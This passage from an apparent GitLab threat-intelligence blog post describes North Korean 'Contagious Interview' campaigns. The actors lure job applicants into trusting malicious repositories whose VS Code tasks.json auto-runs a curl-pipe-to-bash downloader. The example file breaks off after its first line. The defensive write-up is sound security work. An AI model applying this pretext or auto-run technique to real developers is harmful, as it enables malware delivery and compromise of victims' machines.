Recently, GitLab's Threat Intelligence team, part of the Security Operations team, published an extensive article revealing North Korean tradecraft and detailing ways in which GitLab has tracked and disrupted these malicious actors. Security Operations here also includes our Security Incident Response Team (SIRT), Security Logging, Signals Intelligence, and Red Team. This tight collaboration across security disciplines allows us to take tips from threat intelligence, emulate relevant threat actors via Red and Purple Team exercises, and proactively build detection and prevention techniques based on that activity.So, in parallel with the discovery of the North Korean tradecraft and associated Contagious Interview threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.The threat intelligenceThe North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of the attack paths noted was the use of Visual Studio Code tasks for malware distribution. The Contagious Interview threat campaign often relies on fake interview processes to convince their victims to download and open a code repository, enabling attack via VS Code tasks.VS Code tasks are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, tasks.json, developers can automatically run code whenever they open their repository. Trust must be granted to the repository for these tasks to run.Contagious Interview’s pretexts often rely on malicious repositories, so pivoting to using VS Code tasks for code execution is a simple continuation of their pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because the victims believe they are interviewing for a job, the victim is under heavy pressure to “trust” the interviewer’s workspace, enabling the malicious task to run without their knowledge.One example of a malicious tasks.json file is shown below. It is fairly simple — it detects the OS and downloads the next stage of the malware for that platform, using a curl | bash structure. Domains included are placeholders and not actual IOCs. Detailed IOCs for these actors were shared in our previous blog post. "version": "1.0.8",